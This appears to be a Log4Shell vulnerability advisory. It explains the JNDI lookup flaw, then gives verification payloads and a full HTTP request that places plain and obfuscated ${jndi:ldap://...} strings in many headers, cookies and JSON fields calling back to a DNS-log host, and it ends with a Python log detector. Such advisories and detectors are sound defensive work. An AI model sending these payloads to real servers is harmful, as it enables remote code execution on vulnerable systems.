Vulnerability description:
When a user submits input, the application's Log4j 2 component writes that input into the log.
If the logged text contains a string such as ${jndi:ldap:attacker:1099/exp}, Log4j parses it and resolves the URL ldap:attacker:1099/exp through JNDI's lookup() method.
The victim host then connects to the forged LDAP service, retrieves the malicious java.class and executes the malicious code. If the LDAP lookup fails, it automatically falls back to HTTP.
Affected versions:
Apache Log4j 2.x <= 2.14
Condition: the argument reaching lookup() is controllable by the user.
Vulnerability verification:
1. GET method:
http://www.xxxx.cn/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxxx.dnslog.cn}
http://www.xxx.cn/col/col3513?action=${jndi:ldap://${sys:java.version}.xxxx.dnslog.cn}
2. POST method:
PoC:
POST / HTTP/1.1
Host: www.xxxx.cn
Accept-Language: ${jndi:ldap://xxxx.dnslog.cn}
Accept: ${jndi:ldap://xxxx.dnslog.cn}
User-Agent: Mozilla ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/}
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cache-Control: max-age=0
Abc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cookie: ${jndi:ldap://xxxx.dnslog.cn}=${jndi:ldap://xxxx.dnslog.cn};JSESSIONID=${jndi:ldap://xxxx.dnslog.cn};SESSIONID=${jndi:ldap://xxxx.dnslog.cn};PHPSESSID=${jndi:ldap://xxxx.dnslog.cn};token=${jndi:ldap://xxxx.dnslog.cn/vulscan};session=${jndi:ldap://xxxx.dnslog.cn}
X-Remote-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
True-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cf-Connecting_ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Contact: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
If-Modified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Real-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Content-Type: application/json
Content-Length: 857
{"username": "${jndi:ldap://xxxx.dnslog.cn}", "account": "${jndi:ldap://xxxx.dnslog.cn}", "uid": "${jndi:ldap://xxxx.dnslog.cn}", "passwd": "${jndi:ldap://xxxx.dnslog.cn}", "userPassword": "${jndi:ldap://xxxx.dnslog.cn}", "pass": "${jndi:ldap://xxxx.dnslog.cn}", "email": "${jndi:ldap://xxxx.dnslog.cn}", "phone": "${jndi:ldap://xxxx.dnslog.cn}", "pwd": "${jndi:ldap://xxxx.dnslog.cn}", "id": "${jndi:ldap://xxxx.dnslog.cn}", "user": "${jndi:ldap://xxxx.dnslog.cn}", "login_password": "${jndi:ldap://xxxx.dnslog.cn}", "login_username": "${jndi:ldap://xxxx.dnslog.cn}", "userAccount": "${jndi:ldap://xxxx.dnslog.cn}", "password": "${jndi:ldap://xxxx.dnslog.cn}", "email_address": "${jndi:ldap://xxxx.dnslog.cn}", "payload": "${jndi:ldap://xxxx.dnslog.cn}"}
Send the request.
The DNSlog service then shows the callback (response information):
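The request above carries the lookup both in plain form (${jndi:ldap://...}) and in the ${::-j}${::-n}... default-value obfuscation, which Log4j collapses back to "jndi" before resolving it. As an added detection example (not code from the original page), the following Python script undoes URL-encoding, the ${::-x} default-value trick and ${lower:x}/${upper:x} case lookups before matching, so that a log line or header value containing the obfuscated variants is flagged alongside the plain one. The sample log lines and the callback host example.invalid are constructed for the example.

```python
"""Detect Log4Shell-style ${jndi:...} lookups in log lines or HTTP header values.

Added example, not the original page's code. It normalises the obfuscations
seen in the PoC request (URL-encoding, ${::-x} default-value tokens and
${lower:x}/${upper:x} case lookups) before matching, so the obfuscated
User-Agent/Referer variants are caught as well as the plain form.
"""
import re
import urllib.parse

# Constructed sample log lines; example.invalid is a placeholder callback host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /solr/admin/cores?action=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 "-"',
    '10.0.0.9 - - "POST / HTTP/1.1" 200 "Mozilla ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.invalid/}"',
    '10.0.0.11 - - "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 "-"',
    '10.0.0.13 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${upper:l}dap://example.invalid/x}"',
]

# ${<key>:-<default>} with no nested braces -> <default>, e.g. ${::-j} -> j
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# ${lower:x} / ${upper:x} -> x (the final match is case-insensitive anyway)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# The dangerous prefix once obfuscation is removed: ${jndi:<scheme>:
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=8):
    """Repeatedly URL-decode and collapse lookup obfuscations until stable.

    Nested forms such as ${${::-j}${::-n}...} need more than one pass: the
    inner ${::-x} tokens are resolved first, which exposes the outer ${jndi:...}.
    """
    for _ in range(max_rounds):
        previous = text
        text = urllib.parse.unquote(text)
        text = _DEFAULT_VALUE.sub(r"\1", text)
        text = _CASE_LOOKUP.sub(r"\1", text)
        if text == previous:
            break
    return text


def find_jndi_lookups(text):
    """Return the JNDI schemes (ldap, rmi, dns, ...) requested in text, if any."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(text))]


def scan_lines(lines):
    """One hit per line containing a JNDI lookup, with the de-obfuscated form
    so an analyst can see what Log4j would actually have tried to resolve."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append({"line": index, "schemes": schemes, "normalized": normalize(line)})
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi via {','.join(hit['schemes'])}: {hit['normalized']}")
```

The detector is string-level and best-effort: it is meant for triaging access logs, WAF captures or SIEM events, and the normalisation only covers the obfuscations present in the PoC above (plus URL-encoding), not every lookup Log4j understands. It does not replace patching: a host that logs attacker-controlled input with an affected Log4j release should be upgraded regardless of whether probes are seen.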